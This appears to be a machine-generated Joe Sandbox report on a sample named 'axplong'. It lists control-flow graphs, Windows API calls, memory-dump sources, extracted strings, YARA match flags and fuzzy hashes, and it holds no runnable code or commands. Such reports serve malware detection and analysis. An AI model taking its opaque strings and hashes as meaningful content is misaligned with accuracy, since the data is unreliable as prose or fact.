                            control_flow_graph 1469 2e6f71-2e6f87 1470 2e6f89-2e6f8d 1469->1470 1471 2e6f97-2e6fa7 1469->1471 1470->1471 1472 2e6f8f-2e6f95 1470->1472 1475 2e6fa9-2e6fbb SystemTimeToTzSpecificLocalTime 1471->1475 1476 2e6fe7-2e6fea 1471->1476 1473 2e6fec-2e6ff7 call 2ccf21 1472->1473 1475->1476 1478 2e6fbd-2e6fdd call 2e6ff8 1475->1478 1476->1473 1481 2e6fe2-2e6fe5 1478->1481 1481->1473
                            APIs
                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 002E6FB3
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • API ID: Time$LocalSpecificSystem
                            • String ID:
                            • API String ID: 2574697306-0
                            • Opcode ID: 73783b9623eba90f2943cb310b7b738f16acfe16aec8704de86d0239c5852528
                            • Instruction ID: fb56490bff60818614612ba5d04b87acc175d1860d42a5b2977b4b256e40ff02
                            • Opcode Fuzzy Hash: 73783b9623eba90f2943cb310b7b738f16acfe16aec8704de86d0239c5852528
                            • Instruction Fuzzy Hash: E8114F7295020DAACB10DED2D944EDFBBBCAB18360F504266E516E6180E730EB54CB61

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 5736060af7980c767d6ade376dfe76b253b58ed832c1c049e8b3a4e02a56cab8
                            • Instruction ID: 1bf88e36d7cb4d4419d1c491bad5166e9c245da652c5206e402580f26ada58ba
                            • Opcode Fuzzy Hash: 5736060af7980c767d6ade376dfe76b253b58ed832c1c049e8b3a4e02a56cab8
                            • Instruction Fuzzy Hash: FCF0F971E10514ABCB057B68DC07B9E7B79E70B764F80035CF811672D1DB345A204BD2

                            Control-flow Graph

                            control_flow_graph 1523 4cb0369-4cb0376 1525 4cb0378-4cb03ab 1523->1525 1526 4cb03c1-4cb03ef 1523->1526 1531 4cb03b1-4cb03b8 1525->1531 1532 4cb03ac call 4cb03b9 1525->1532 1533 4cb03f6-4cb0442 1526->1533 1532->1531
                            Memory Dump Source
                            • Source File: 00000006.00000002.2982742676.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 770737910e09d109c5a7624152f8ecb9e513eceab66f4e65815845f920aaac8c
                            • Instruction ID: c6cf31e4003d867efcfe01ff497f3471a02ef87ae57ce77b46a4104b9bebaf3a
                            • Opcode Fuzzy Hash: 770737910e09d109c5a7624152f8ecb9e513eceab66f4e65815845f920aaac8c
                            • Instruction Fuzzy Hash: ABF096E735C310BE710155832718AF7662FE5C2630F70C426F483C6402FA956E0D38B1
                            Memory Dump Source
                            • Source File: 00000006.00000002.2982742676.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 32c03c901a63f1d761cf05c5e6b0201156098b0794c0cdc40b3f41a1b672a4d4
                            • Instruction ID: 311aa408e1aac5585f3c1d722f038e3f675fcd91e65b646c7f75c834f437e674
                            • Opcode Fuzzy Hash: 32c03c901a63f1d761cf05c5e6b0201156098b0794c0cdc40b3f41a1b672a4d4
                            • Instruction Fuzzy Hash: 71E01AEB24C120AE704180833B68AFB972EE1C2231B34C837F887D1402E6895A4E3571
                            Memory Dump Source
                            • Source File: 00000006.00000002.2982742676.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 79a37b82975745259f5471491b9468d4d3b8a60f3ddb4a0b022ff3903adaa82d
                            • Instruction ID: 6f66b23f8ea514f241dbbf5bb4a10ef84942873db1007123a248350412cc864c
                            • Opcode Fuzzy Hash: 79a37b82975745259f5471491b9468d4d3b8a60f3ddb4a0b022ff3903adaa82d
                            • Instruction Fuzzy Hash: 32E0B6EB24C164AEA14281532B19AFA6B2EE4C2231B34C462F082D5407E6895A5E7972
                            Memory Dump Source
                            • Source File: 00000006.00000002.2982742676.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1302cf8257deb7c3462acad2a8283ae7e3f6f78071b8b59f0316cef07478aded
                            • Instruction ID: 9907f430edf71a85cbee620db8cad9a0d35477e898f63f68874e8521aac324e3
                            • Opcode Fuzzy Hash: 1302cf8257deb7c3462acad2a8283ae7e3f6f78071b8b59f0316cef07478aded
                            • Instruction Fuzzy Hash: 0BE0ECEB249014ADA04195537B189FAA73DE4C2334734C437F442D7403E6995B5E7971
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • API ID:
                            • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d41$fed3aa
                            • API String ID: 0-1572351859
                            • Opcode ID: 60987ed3c43b6ef349bbe478194cf588d0572cb335ea0db518c38c7b9c24a147
                            • Instruction ID: ed4a359b183aa374055775cac8d775301308f7b71e02734b66416781bf5c0a0e
                            • Opcode Fuzzy Hash: 60987ed3c43b6ef349bbe478194cf588d0572cb335ea0db518c38c7b9c24a147
                            • Instruction Fuzzy Hash: 44720570924248DBEF14EF68C949BDDBFB6AB05304F50829CE805673C2C7759A98CF92
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • API ID: __floor_pentium4
                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                            • API String ID: 4168288129-2761157908
                            • Opcode ID: e32e4cd19ec27a79b0b89221c3da5ec00b0efa445cd13859096d89eda5a74c58
                            • Instruction ID: 1aff3f509aa85dee59d6f0917baa7a5e0d1e73277655baaf3f0a5e9be00527c8
                            • Opcode Fuzzy Hash: e32e4cd19ec27a79b0b89221c3da5ec00b0efa445cd13859096d89eda5a74c58
                            • Instruction Fuzzy Hash: B7C22971E2462D8BDB25DE28DD407EAF3B9EB48384F1441EAD94DE7240E774AE918F40
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                            • Instruction ID: 6084d1705f2f2afc09b5893a608830756f05eb1214a4a8bc0b54b0d9a0ac1864
                            • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                            • Instruction Fuzzy Hash: 94F15D71E1021ADBDF14CFA8C8806AEF7B1FF49354F25826AD919AB344D730AE15CB90
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 002B247E
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • API ID: ___std_exception_copy
                            • String ID: 'k,d+1$'k,d+1
                            • API String ID: 2659868963-3369981402
                            • Opcode ID: 89fce1ea59fe18c1db8b59d3c89f81203d3542b21f74a3292cd744fc338be645
                            • Instruction ID: b44de3aec6609fced87af0b83803e5b46e2bf45ea52a28f179908bdf541fea51
                            • Opcode Fuzzy Hash: 89fce1ea59fe18c1db8b59d3c89f81203d3542b21f74a3292cd744fc338be645
                            • Instruction Fuzzy Hash: AB5189B2E20606CBDB16CF59D881BAAB7F9FF48310F24866AD405EB254D7709960CF50
                            APIs
                            • GetSystemTimePreciseAsFileTime.KERNEL32(?,002CCE82,?,?,?,?,002CCEB7,?,?,?,?,?,?,002CC42D,?,00000001), ref: 002CCB33
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$FilePreciseSystem
                            • String ID:
                            • API String ID: 1802150274-0
                            • Opcode ID: 2cf0e28ebcfea305b8294476e693018bff6071078231e9ec719c4faf7a938215
                            • Instruction ID: 805dc3d66ab43abc53d8c00eefc0c319beddee371594e66e39e6d649165127d4
                            • Opcode Fuzzy Hash: 2cf0e28ebcfea305b8294476e693018bff6071078231e9ec719c4faf7a938215
                            • Instruction Fuzzy Hash: 09D0223252303CD3CA062FD0BC05EACBB0D8A04B18B984256E80D33120CE516C105BD0
                            Strings
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                            • Instruction ID: 52a80abeeb14b1af58f5d260799b931eaf14e241b2e5fb0283ea146b3a341b79
                            • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                            • Instruction Fuzzy Hash: 9051A8302FC6CA56DB388E3B88953BE679A9F43300FD80559D482C7A82DB519D349352
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2696f9cf99d7da95f535fa43a37144db77be026736458c9b25a16ca5a088edf
                            • Instruction ID: 4230764e4b4185060c40108e43144b370fba3b958701b3c57bf79fe2c59bfb5e
                            • Opcode Fuzzy Hash: d2696f9cf99d7da95f535fa43a37144db77be026736458c9b25a16ca5a088edf
                            • Instruction Fuzzy Hash: 39224EB3F515144BDB4CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158648
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6578423f5c241e72c582e6e14e340fb18ca8ceecb2328b7973a34444ba5c53e7
                            • Instruction ID: 11e5a9ca38b9f9b41ec4dad49d17d4f65dd4dc0231f6539160fa662ef188bc80
                            • Opcode Fuzzy Hash: 6578423f5c241e72c582e6e14e340fb18ca8ceecb2328b7973a34444ba5c53e7
                            • Instruction Fuzzy Hash: 7EB16C31224609DFD715CF28C486B65BBA0FF453A4F25866CE99ACF2A1C735E9A1CB40
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6b145cb61db71daad2c480785143f8456a64c815c873c1348c19d28cd6e0dcb4
                            • Instruction ID: 18545a4bdae47e25f7c1ab71469cacda8815f264ec54388b2b77ca8074cb3381
                            • Opcode Fuzzy Hash: 6b145cb61db71daad2c480785143f8456a64c815c873c1348c19d28cd6e0dcb4
                            • Instruction Fuzzy Hash: 4651B17061D3928FC319CF2D912563AFFE1AF95340F084A9EE0D687292D774DA58CB91
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b69236aca418db36fa01f707a980880002a552e952bc09fdf9a656d075a39171
                            • Instruction ID: 6bb191a3cd7d875b58ca9a4ded832cfedfeecaf146d8ea8f313fbb0d8aa3131f
                            • Opcode Fuzzy Hash: b69236aca418db36fa01f707a980880002a552e952bc09fdf9a656d075a39171
                            • Instruction Fuzzy Hash: 6D21B673F204394B770CC57E8C572BDB6E1C68C641745823AE8A6EA2C1D968D917E2E4
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd6efc6488ce40042c1194a6ef289ad2982a858311c4c9cfa6597641f468eef5
                            • Instruction ID: cfa2993f61527981b807243ff254386e7b7a56ee8f291b8892543f8ab3ad5f8d
                            • Opcode Fuzzy Hash: dd6efc6488ce40042c1194a6ef289ad2982a858311c4c9cfa6597641f468eef5
                            • Instruction Fuzzy Hash: 2C118A23F30C295B675C817D8C172BAA5D6DBDC25071F533AD826E7384E994DE23D290
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                            • Instruction ID: 4f4c8a1a114bdc4c80f52a237bda1326f6f0e38566447ce6b73f7ae1977b448a
                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                            • Instruction Fuzzy Hash: C111387F22014B43D604AE2DC8F4BBBE796EAC53A1B3C437AC3414B758DA229964D900
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2fff4213254930ed00e7ed228dbaec84f54ae4095a2e15fad1c258fa6de72d8
                            • Instruction ID: 5eb10265fc2b1fa3c80d809dda812d5f0d13a51609296143dcfd94e22996ca78
                            • Opcode Fuzzy Hash: d2fff4213254930ed00e7ed228dbaec84f54ae4095a2e15fad1c258fa6de72d8
                            • Instruction Fuzzy Hash: 85E086301916886FDF35BF16C85CD483B5BEB62384F448404F81456261CB35FD91DD80
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                            • Instruction ID: d5eb46ba91d1184ebeb8a36cbb1aba8cea0ec013de4ed668b68b9cd168eebcce
                            • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                            • Instruction Fuzzy Hash: BCE08C32965268EBCB15DBC9C904D8AF3ECEB48B10F958096F505D7240C2B0EF00CBD0
                            APIs
                            • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 002C795C
                            • __Cnd_destroy_in_situ.LIBCPMT ref: 002C7968
                            • __Mtx_destroy_in_situ.LIBCPMT ref: 002C7971
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                            • String ID: 'k,d+1$@y,$d+1
                            • API String ID: 4078500453-3051532360
                            • Opcode ID: 39e1a9687afac42843b33da5a520500a726a57dbb30d106227e961d3fbcb717a
                            • Instruction ID: 564d9177f4c10fe00275d9c96e364c3afd8413a8cc636c0982d1f28c32551d51
                            • Opcode Fuzzy Hash: 39e1a9687afac42843b33da5a520500a726a57dbb30d106227e961d3fbcb717a
                            • Instruction Fuzzy Hash: AF31F2B29243059BD720DF68D846F6AB7E8EF18350F000B3EE945C3241E771EA64CBA1
                            APIs
                            Strings
                            Yara matches
                            Similarity
                            • API ID: _wcsrchr
                            • String ID: .bat$.cmd$.com$.exe
                            • API String ID: 1752292252-4019086052
                            • Opcode ID: 00ea6f69934e88b4d4b73ef1ccbd5ade06917765642a64a06869687f5d9de8ff
                            • Instruction ID: a0f1c3b04e74b5a07fdf06bbeff9341e8c002f0ee486b05a8ac16222fcfc3b16
                            • Opcode Fuzzy Hash: 00ea6f69934e88b4d4b73ef1ccbd5ade06917765642a64a06869687f5d9de8ff
                            • Instruction Fuzzy Hash: 81014E376F8397225619281BDC0267B57C89B82BB4B65002BFE48FF3C2DF44DC228690
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Mtx_unlock$Cnd_broadcast
                            • String ID:
                            • API String ID: 32384418-0
                            • Opcode ID: 702015ae0d4fc412975a5a5784e1104345786dddd322586c1e28d397a878a1e5
                            • Instruction ID: 98bf51f0b7fab5272a1055f52d44d14fdd680e5e12288b54d03142397016b8f1
                            • Opcode Fuzzy Hash: 702015ae0d4fc412975a5a5784e1104345786dddd322586c1e28d397a878a1e5
                            • Instruction Fuzzy Hash: E9A1D1709203069FDB11EF64C945BAAB7F8FF15390F14862DE819D7641EB30EA28CB91
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 002B2806
                            • ___std_exception_destroy.LIBVCRUNTIME ref: 002B28A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___std_exception_copy___std_exception_destroy
                            • String ID: P#+$P#+
                            • API String ID: 2970364248-3630811068
                            • Opcode ID: 70b2a9a9586c1e09a9de834652ffb17de91ee2705a43e96fe575469d42251518
                            • Instruction ID: 8bf694f6cca2586009ac8037497c7382080c573fdf3ccfbfe4aab7d0ff27ce79
                            • Opcode Fuzzy Hash: 70b2a9a9586c1e09a9de834652ffb17de91ee2705a43e96fe575469d42251518
                            • Instruction Fuzzy Hash: F671A071E10248DFDB05CFA8C881BDDFBB5EF49310F54822DE805A7281EB74A994CBA5
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 002B2B23
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___std_exception_copy
                            • String ID: P#+$P#+$This function cannot be called on a default constructed task
                            • API String ID: 2659868963-3747907092
                            • Opcode ID: 5f4ae2c1d74c0765fbba671cdefa165682f7caef8a00d03882623cd15d2f7e41
                            • Instruction ID: 69373df27dba9ba99849b4e6ffd78c72d307890bafe1a761b2a981b760b98585
                            • Opcode Fuzzy Hash: 5f4ae2c1d74c0765fbba671cdefa165682f7caef8a00d03882623cd15d2f7e41
                            • Instruction Fuzzy Hash: FEF0F67092030C9BC715DF689841ADEB7EDDF05300F5042AEF84897641EB70AA648B94
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 002B247E
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___std_exception_copy
                            • String ID: 'k,d+1$P#+$P#+
                            • API String ID: 2659868963-3687900473
                            • Opcode ID: c96602b61fe2440ad73d7e6ef95555d1ff4944c27e44db1370079db165e3a0f0
                            • Instruction ID: ffe50b62689af6755c7638275dc8d2133fd03a81382ae70d7e8d1c0b2cfb571a
                            • Opcode Fuzzy Hash: c96602b61fe2440ad73d7e6ef95555d1ff4944c27e44db1370079db165e3a0f0
                            • Instruction Fuzzy Hash: 0CF0E5B592030C67C718EBE4DC059CAB3ECDE1A300F408A25F644EB640FBB0FA948B91
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strrchr
                            • String ID:
                            • API String ID: 3213747228-0
                            • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                            • Instruction ID: 6f5c35f885ebf42d949694acdf36886cea26db1743e3c2a153cb1236e9fb5a26
                            • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                            • Instruction Fuzzy Hash: 60B168329602C69FDB11CFAAC851BBEBBE5EF55340F7441AAE845DB341D6348D12CB60
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xtime_diff_to_millis2_xtime_get
                            • String ID:
                            • API String ID: 531285432-0
                            • Opcode ID: 774aedaede76e9a3711c1516632479cb22c6cb9e3aedf9ea3951256c4d324711
                            • Instruction ID: 1403c77275e0a8be2548534b448241a80327373c44c9ab07b652ef69ae495b30
                            • Opcode Fuzzy Hash: 774aedaede76e9a3711c1516632479cb22c6cb9e3aedf9ea3951256c4d324711
                            • Instruction Fuzzy Hash: 1A214F71A111099FDF15EFA4CC82EAEBBB8EF09714F500169F905B7251DB30AD118FA1
                            APIs
                            • __Mtx_init_in_situ.LIBCPMT ref: 002C726C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Mtx_init_in_situ
                            • String ID: @.+$`z,
                            • API String ID: 3366076730-3529498242
                            • Opcode ID: d870a0833ec0510d154bf29a10b7b869846393cd5536d3311c4222d3e0859032
                            • Instruction ID: fc3abacc773a25f6305872a724691a8e35edb451bc4cc108cfc5207693b5da41
                            • Opcode Fuzzy Hash: d870a0833ec0510d154bf29a10b7b869846393cd5536d3311c4222d3e0859032
                            • Instruction Fuzzy Hash: 33A127B4E116158FDB21CFA8C984B9EBBF0AF48710F19825EE819AB351D7759D01CF81
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___free_lconv_mon
                            • String ID: 8"1$`'1
                            • API String ID: 3903695350-1012482134
                            • Opcode ID: 31c416f218f559d66bef1f2220ecfc719514b92820b48d593b52e35162ea9c7b
                            • Instruction ID: 14d503f2d03ad89140ec086074907163d71cfb62f19fe93b995c51e9a2d33634
                            • Opcode Fuzzy Hash: 31c416f218f559d66bef1f2220ecfc719514b92820b48d593b52e35162ea9c7b
                            • Instruction Fuzzy Hash: 6A3192315A03869FEB61AF3ADA05B5673E8AF40310FA0486AE846D7151DF31FCA0CF11
                            APIs
                            • __Mtx_init_in_situ.LIBCPMT ref: 002B3962
                            • __Mtx_init_in_situ.LIBCPMT ref: 002B39A1
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Mtx_init_in_situ
                            • String ID: pB+
                            • API String ID: 3366076730-3309528453
                            • Opcode ID: 98d76686c5f46406dde89820ba646dd13a729ee63973bd0e8c214a7881836247
                            • Instruction ID: 69f83658ffdb1f6a205a77cd913ca8e8894068b578dafff352476150cfad4bdf
                            • Opcode Fuzzy Hash: 98d76686c5f46406dde89820ba646dd13a729ee63973bd0e8c214a7881836247
                            • Instruction Fuzzy Hash: B74125B0501B059FD720CF18C588B9ABBF0FF44355F24861DE86A8B341E7B4AA15CF80
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 002B2552
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___std_exception_copy
                            • String ID: P#+$P#+
                            • API String ID: 2659868963-3630811068
                            • Opcode ID: ed869ac024ba471c7f902c38efc6f85bd0ab96595190cac261cad3ffe9d4c1f5
                            • Instruction ID: 6e62ff946a4b019f16bf32d81548c88337a5edcc98b54685f573a603c483f847
                            • Opcode Fuzzy Hash: ed869ac024ba471c7f902c38efc6f85bd0ab96595190cac261cad3ffe9d4c1f5
                            • Instruction Fuzzy Hash: ADF0E270D1120C9BC715DF68D840A8EBBF8AF4A300F1082AEE444A7240EA705A648B94